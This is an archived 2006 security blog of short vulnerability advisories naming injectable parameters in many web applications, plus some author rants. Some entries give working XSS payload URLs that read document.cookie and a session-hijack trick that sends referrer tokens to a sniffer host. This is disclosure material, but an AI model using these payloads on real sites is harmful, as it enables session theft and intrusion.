by r0t,der4444,cembo,VietMafia

Tuesday, June 27, 2006

Multiple Browsers Information Disclosure vuln.

Multiple Browsers Information Disclosure vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
###############################################

Vuln. Description:


Multiple Browsers contains a flaw which can be exploited by malicious people to disclose potentially sensitive information.
An error in the handling of redirections can be exploited to access documents served from another web site via the "object.documentElement.outerHTML" property.

Affected browsers:

MYweb4net Browser 3.8.8.0
http://www.mybrowser.web4net.net/

GreenBrowser 3.4.0622
http://www.morequick.com/

Maxthon v1.5.6 build 42
http://www.maxthon.com/

PhaseOut 5.4.4
http://www.phaseout.net/

FineBrowser Freeware version v3.2.2
http://www.finebrowser.com/

Slim Browser 4.07 build 100
http://www.flashpeak.com/

NetCaptor 4.5.7 Personal Edition
http://www.netcaptor.com/

Enigma Browser 3.8.8
http://www.suttondesigns.com/

Fast Browser Pro 8.1
http://fastbrowser.net/

GoSuRF Browser 2.62
http://gosurfbrowser.com/?ln=en

Previous versions off those browsers also can be affected.



Tested on Windows XP/SP2 and IE 6 ( some of those browsers use IE engine to run, but offcourse not vuln. IE 6.0 was used for that tests.)


note: This advisory is based on Plebo Aesdi Nael advisory in IE.

Reff url: http://secunia.com/advisories/20825/


###############################################
Solution:
Disable Active Scripting support.
###############################################
More information @ unsecured-systems.com/forum/

Hostflow vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.hostflow.com/
affected versions:2.2.1-15 and previous
###############################################

Vuln. Description:

Hostflow contains a flaw which could allow a remote attacker to hijack user sessions. A remote attacker can retrieve the authentication information to hijack a user session if a user includes a URL link within a helpdesk message because in default there isn't IP address verification. This would allow the attacker to take control victims control panel.


example:

1.
post:
(img src="http://[sniffer-host]/r0t.gif" width="0" height="0")
note: change "(" to "<" and ")" to ">"

2. or it also will works with simple refferal url function.
For manual testing use html code and create hyperlink to resource wich will show you refferal url´s in example some hit counter or statistic apllication do it well.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

HSPcomplete vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.swsoft.com/en/products/hspcomplete/
affected versions:3.2.2 , 3.3 Beta and prior
###############################################

Vuln. Description:

HSPcomplete contains a flaw that allows a remote sql injection attacks.Input passed to the "type" parameter in "report.php" and input passed to the "level" parameter in "custom_buttons.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

H-Sphere <=2.5.x XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.psoft.net/h_sphere2_info.html
affected versions:2.5.1 Beta 1 (2.5.1.801.20060621)
and previous
###############################################

Vuln. Description:



H-Sphere contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "next_template","start","curr_menu_id","arid" parameters isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP
?template_name=mailman/massmail.html&arid=46&curr_
menu_id=&start=&next_template=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP
?template_name=mailman/massmail.html&arid=46&curr_men
u_id=&start=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP
?template_name=mailman/massmail.html&arid=46&curr_me
nu_id=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.C
P?template_name=mailman/massmail.html&arid=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, June 26, 2006

Zorum Forum <=3.5 vuln.

###############################################
Vuln. discovered by : r0t
Date: 26 june 2006
vendor:http://zorum.phpoutsourcing.com/
affected versions:3.5 and prior
###############################################

Vuln. Description:

1.
Zorum Forum contains a flaw that allows a remote sql injection attacks.Input passed to the "offset","tid","fromid","sortby","fromfrommethod","fromfromlist" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
Zorum Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "frommethod","list","method" parameter in "index.php" and most parameters from SQL injection vuln. isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Additional info:
Some of those parameters by both vulnerabilities will give Full Path Disclosure and there will be many other parameters wich isnt properly sanitised.
And if it will be not enough you can aslo figure out something like sql injection form search engine module, just try to add in any possible field some "unsanitised" input and you will see.

ref:
Zorum Arbitrary Command Execution and SQL Injection Vulnerabilities
Zorum forum 3.5 sql injection exploit



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Хакер (Андрей Житков)



Он – хакер. Гений и хулиган. Его цель – взломать банковскую сеть и стать миллионером. Для него это не более чем компьютерная игра. Но вскоре он сам становится персонажем чьей-то совсем не виртуальной игры, а его друзья и знакомые погибают от настоящего, а не виртуального оружия…

Download

Sunday, June 25, 2006

DeluxeBB <=1.07 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.deluxebb.com/
affected versions:1.07 and prior
###############################################

Vuln. Description:

DeluxeBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "subject" and "to" parameter in "pm.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ICT - Infinite Core Technologies vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.infinitecore.com/
affected versions:1.0 Gold and prior
###############################################

Vuln. Description:

ICT contains a flaw that allows a remote sql injection attacks.Input passed to the "post" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

OpenForum XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:www.2enetworx.com/dev/projects/openforum.asp
affected versions:1.2 Beta and prior
###############################################

Vuln. Description:

OpenForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "ofdisp" and "ofmsgid" parameter in "openforum.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

GL-SH Deaf Forum XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.frank-karau.de/
affected versions:6.4.3 and prior
###############################################

Vuln. Description:

GL-SH Deaf Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "sort" parameter in "show.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpQLAdmin vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://phpqladmin.com
affected versions:2.2.x and previous
###############################################

Vuln. Description:


phpQLAdmin contains multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "domain" parameter in "user_add.php" and "unit_add.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, June 24, 2006

XennoBB XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.xennobb.com/
affected versions:1.0.5 and prior
###############################################

Vuln. Description:

XennoBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "tid" parameter in "messages.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

btw ...

Somebody was asked to me why coments on this blog is "censured" - moderated.
Every day tehere are almost 50 spammers with comercial spam, like credit loans and other shit...im not suprissed cauz many of my reports/advisories are ecommerce webaplications.
To fight with spammers ..hm... if it was one ..it will be not so dificult , but ...
Any way spam sucks...

In my last post i told that i will not have time to publish advisories and report about unsecured systems and i told that i will post 10-15 and thats will be end and other guys or VietMafia will continue contribute blog with advisories.
IN place of 10-15 is more than 50 became , cauz VietMafia didnt .... So for me its to easy to do nothin, thats why i didnt stop..even my time is limited . I will continue so long as i can.

And again there is some developers (2 from 50) who are shocked that i didnt contacted them and reported about vuln.
I regullary try to do this in every 100 advisory i try, so no succesfull result till now, so why i must?
So i think that we stay in one point, i can do only my job wih success if you do mistakes, if you dont i can do my job.
Everyone have mistakes and im not better than you , its just my job to find out some mistakes.
In that point i wanna also say thanks to Secunia and OSVDB guys for support.

And till now i didnt wrote article about wich i had promissed to write,cauz im waiting when cembo will complete PVS-Pridels Vuln Scanner , if its will be great tool my meaning can change and content of article to, thats why i better wait.
And before it will be published i will try as alternative for my fingers... :)

mvnForum XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.mvnforum.com/
affected versions:1.0 GA and prior
###############################################

Vuln. Description:

mvnForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "member" and "activatecode" parameters in activatemember isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:
mvnForum/activatemember?activatecode=&mem
ber=%22%3Cscript%3Ealert('r0t')%3C/script%3E

mvnForum/activatemember?activatecode=%22%3Cscri
pt%3Ealert(document.cookie)%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

UebiMiau Webmail XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.uebimiau.org/
affected versions:2.7.10 ,2.7.2 and prior
###############################################

Vuln. Description:

UebiMiau Webmail contains multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "f_user" parameter in "index.php" and input passed to the "pag" parameter in "messages.php" and input passed to the "lid","tid","sid" parameter in "error.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Anthill SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://anthill.vmlinuz.ca/
affected versions:0.2.6 and 0.3.0 and prior
###############################################

Vuln. Description:

Anthill contains a flaw that allows a remote sql injection attacks.Input passed to the "order" parameter in "buglist.php" and input passed to the "bug" parameter in "query.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

note:
Successful exploitation of the query.php script requires that "magic_quotes_gpc" is disabled.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, June 22, 2006

BNBT TrinEdit vuln.

###############################################
Vuln. discovered by : r0t
Date: 22 june 2006
vendor:http://bnbteasytracker.sourceforge.net/
affected versions:7.7r3.2004.10.27 and prior
###############################################

Vuln. Description:

BNBT TrinEdit contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "filter" and "sort" parameter in "index.html" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


note:
Its possible that BNBT EasyTracker 7.7r3.2004.10.27 have same problem.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, June 21, 2006

Azureus <=2.4.0.2 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://azureus.sourceforge.net/
affected versions:Azureus 2.4.0.2
Azureus Tracker version 2.4.0.2/2.0
and previos versions
###############################################

Vuln. Description:

Azureus : Java BitTorrent Client Tracker contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "search" parameter in "index.tmpl" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
http://host:6969/index.tmpl?search=%22%3Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Enterprise Groupware System XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.enterprisegroupwaresystem.org/
affected versions:1.2.4 and prior
###############################################

Vuln. Description:

EGS contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "module" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

dev Vs def

While surfing i found one article from one developer (Jörg Stöber) ,a developer of Content*Builder.
His wroten article title is - Defacing?!!
He says that now he knows what means defacing.
I suppose that he started recognize that stuff after Kacper had discovered multiple remote file include vuln. in Content*Builder.
Whats happends later , you know if you will look at views count only in milw0rm.
Also as Jörg says that there was many deface attemps to sites wich use they software.
Till that i understood his message cleary, but when he start to explain and teach about that stufff wich he knows some days only...And say that "script kidies" are use almost Opensource to find variables where including remote files arent properly santized.
In that point Jörg,i dont like also defacers ... but almost software auditors dont have nothing together with defacers like " Hack3d by TurKish HacKerS t34m!!!", only thing is that most of webbaplication auditors/pentesters work is used to attack vuln. software using websites.
And for a "Script Kidie" is easiest way to deface is using published POC , where he must only change from http://victim-host.com/vuln_file.php?include_path= to your host name.
And i like developers like you ... who are dumb enough to code unsecure and in that time also clever to teach/speak about security and give to people stattus wich kind of them can be used by yourself.
If you was lame to code , than why you must now speak in that way,try to look at you source better and not speak as coder god, cauz its still have more mistakes as mine english.

Knowlegde is power.

Ultimate eShop XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.ultimate-eshop.de/
affected versions:1.00 and prior
###############################################

Vuln. Description:

Ultimate eShop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "subid" parameter in "index.cgi" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpTRADER Multiple SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:
www.bluehouse-project.de/index.php?area=1&p=product
affected versions:4.9 SP 5 and prior
###############################################

Vuln. Description:

phpTRADER contains a flaw that allows a remote sql injection attacks.Input passed to the "sectio" parameter in "login.php","write_newad.php","newad.php",
"printad.php","askseller.php","browse.php",
"showmemberads.php","note_ad.php","abuse.php",
"buynow.php","confirm_newad.php" and input passed to the "an" parameter in "printad.php","note_ad.php" and input passed to the "who" parameter in "showmemberads.php" and input passed to the "adnr" parameter in "buynow.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

UltimateGoogle XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:www.thinkfactory.de/produkte/google/
affected versions:1.00 and prior
###############################################

Vuln. Description:

UltimateGoogle contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "REQ" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

thinkWMS SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:www.thinkfactory.de/produkte/thinkWMS/
affected versions:1.0 and prior
###############################################

Vuln. Description:

thinkWMS contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "index.php","printarticle.php" and input passed to the "catid" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Ultimate Estate vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:www.thinkfactory.de/produkte/ultimate-estate/
affected versions:1.0 and prior
###############################################

Vuln. Description:

1.
Ultimate Estate contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "index.pl" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
Ultimate Estate contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat" parameter in "index.pl" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Ultimate Auction XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.ultimate-auction.de/
affected versions:1.0 and prior
###############################################

Vuln. Description:

Ultimate Auction contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "item" parameter in "emailtofriend.pl","violation.pl" and input passed to the "seller" parameter in "vsoa.pl" and input passed to the "user" parameter in "userask.pl","leavefeed.pl" and input passed to the "itemnum" parameter in "userask.pl" and input passed to the "category" parameter in "itemlist.pl" and input passed to the "query" parameter in "search.pl" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

FineShop vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://fineshop.pl/
affected versions:3.0 and prior
###############################################


Vuln. Description:

1.
FineShop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "promocja","wysw","id_produc" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2.
FineShop contains a flaw that allows a remote sql injection attacks.Input passed to the "produkt","id_produc","id_kat" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

IMGallery vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.imgallery.zor.pl/
affected versions:2.4 and prior
###############################################


Vuln. Description:

IMGallery contains a flaw that allows a remote sql injection attacks.Input passed to the "start","sort" parameter in "galeria.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tuesday, June 20, 2006

Atlassian JIRA™ Information Disclosure

###############################################
Vuln. discovered by : r0t
Date: 20 june 2006
vendor:http://www.atlassian.com/software/jira/
affected versions:
Enterprise Edition, Version: 3.6.2-#156
other versions also can be affected
###############################################

Vuln. Description:



Input passed via the URL when accessing "secure/ConfigureReleaseNote.jspa" directly isn't properly sanitised before being returned to the user in an error response. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Atlassian JIRA™ contains a flaw that allows malicious people to gain knowledge of various system information.Input passed to the "projectId" parameter in "secure/ConfigureReleaseNote.jspa" isn't properly sanitised before being returned to the user.
With error message/report remote attacker will get various system information in example to get full install path, used software,general system configuration.


###############################################
Solution:
Restrict access to the "secure/ConfigureReleaseNote.jspa" script in a proxy server or firewall with URL filtering capabilities. This may affect functionality.

###############################################
More information @ unsecured-systems.com/forum/

phpMyForum <=4.1.3 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 june 2006
vendor:http://www.phpmyforum.de/
affected versions:4.1.3 and prior
###############################################

Vuln. Description:

phpMyForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "highlight" parameter in "topic.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

CavoxCms SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 june 2006
vendor:http://www.cavoxcms.ch/
affected versions:v1.0.16 and prior
###############################################

Vuln. Description:


CavoxCms contains a flaw that allows a remote sql injection attacks.Input passed to the "page" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, June 19, 2006

NC LinkList XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.php-linkverzeichnis.de/
affected versions:1.2 and prior
###############################################

Vuln. Description:

NC LinkList contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat" and "view" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Clubpage vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.powerbatt.com/c-page/
affected versions:Clubpage
###############################################

Vuln. Description:

1.
Clubpage contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "news_archive","language","intranetLogin" parameter in "index.php" and input passed to the "sites_id" parameter in "sites.php" and input passed to the "news_id" parameter in "news_more.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2.
Clubpage contains a flaw that allows a remote sql injection attacks.Input passed to the "category" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


note: XSS and sql injection vuln. also you will find in modules like calendar,runers-script and others.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SLAB500 vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.slab500.com/
affected versions:SLAB500 and prior
###############################################

Vuln. Description:

SLAB500 contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" and "addcomment" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

note:
Input in "page" parameter in "index.php" will give full path disclosure, and maybe a minimal possibilty to inluce files from local resource.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

PHCDownload SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.phpcredo.com/
affected versions:
v1.0.0 Final
v1.0.0 Release Candidate 6
and prior
###############################################

Vuln. Description:


PHCDownload contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "category.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

AssoCIateD XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://herve.labas.free.fr/acid/en/
affected versions:v1.2.0 and prior
###############################################

Vuln. Description:

AssoCIateD contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "menu" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/index.php?p=gal&menu=1[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Arctic XSS

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:www.olate.co.uk/products/arctic/
affected versions:1.0.2 and prior
###############################################

Vuln. Description:

Input passed to the search results page and the "/index.php?cmd=search" Query field form isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Open-Realty SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.open-realty.org/
affected versions:2.3.1
###############################################

Vuln. Description:


Open-Realty contains a flaw that allows a remote sql injection attacks.Input passed to the "sorttype" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Free Realty vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://freerealty.rwcinc.net/
affected versions:2.9-0.7,2.9-0.6 and prior
###############################################

Vuln. Description:

Free Realty contains a flaw that allows a remote sql injection attacks.Input passed to the "sort" parameter in "propview.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Note about prior versions:
I tested that bug also on Demo site wich are 2.9-0.6, so in same variable was possible XSS ...
And in some earlier 2.9 versions , with an error attacker will get installisations full path and other info.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BtitTracker SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.btiteam.org/
affected versions:v.1.3.2 and prior
###############################################

Vuln. Description:

BtitTracker contains a flaw that allows a remote sql injection attacks.Input passed to the "by" and "order" parameter in "torrents.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpMyDirectory XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 june 2006
vendor:http://www.phpmydirectory.com/
affected versions:v.10.4.5 and prior
###############################################

Vuln. Description:

phpMyDirectory contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "PIC" parameter in "offers-pix.php" and input passed to the "from" parameter in "cp/index.php" and input passed to the "action" parameter in "cp/admin_index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Sunday, June 18, 2006

Sharky e-shop XSS

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:http://www.lombar.net/shop/main.asp
affected versions:3.05 and prior
###############################################

Vuln. Description:

Sharky e-shop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "maingroup","secondgroup" parameter in "search_prod_list.asp" and input passed to the "maingroup" parameter in "meny2.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

The Edge eCommerce Shop XSS

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:https://www.theedgeshop.com/index.html
affected versions:last
###############################################

Vuln. Description:

The Edge eCommerce Shop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cart_id" parameter in "productDetail.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tradingeye Shop R4 XSS

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:http://www.dpivision.com/
affected versions:R4 and prior
###############################################

Vuln. Description:

Tradingeye Shop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "image" parameter in "details.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

tplShop v 2.0 vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:http://www.tpl-design.com/tplshop/
affected versions:V 2.0 and prior
###############################################

Vuln. Description:

tplShop contains a flaw that allows a remote sql injection attacks.Input passed to the "first_row" parameter in "category.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

xarancms V2.0 vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 june 2006
vendor:www.xaran.de/html/xaran_xarancmsV2.0.php
affected versions:V2.0 and prior
###############################################

Vuln. Description:

xarancms contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "xarancms_haupt.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, June 15, 2006

SiteForge Collaborative Development Platform XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.sitelliteforge.com/
affected versions:1.0.4 and prior
###############################################

Vuln. Description:

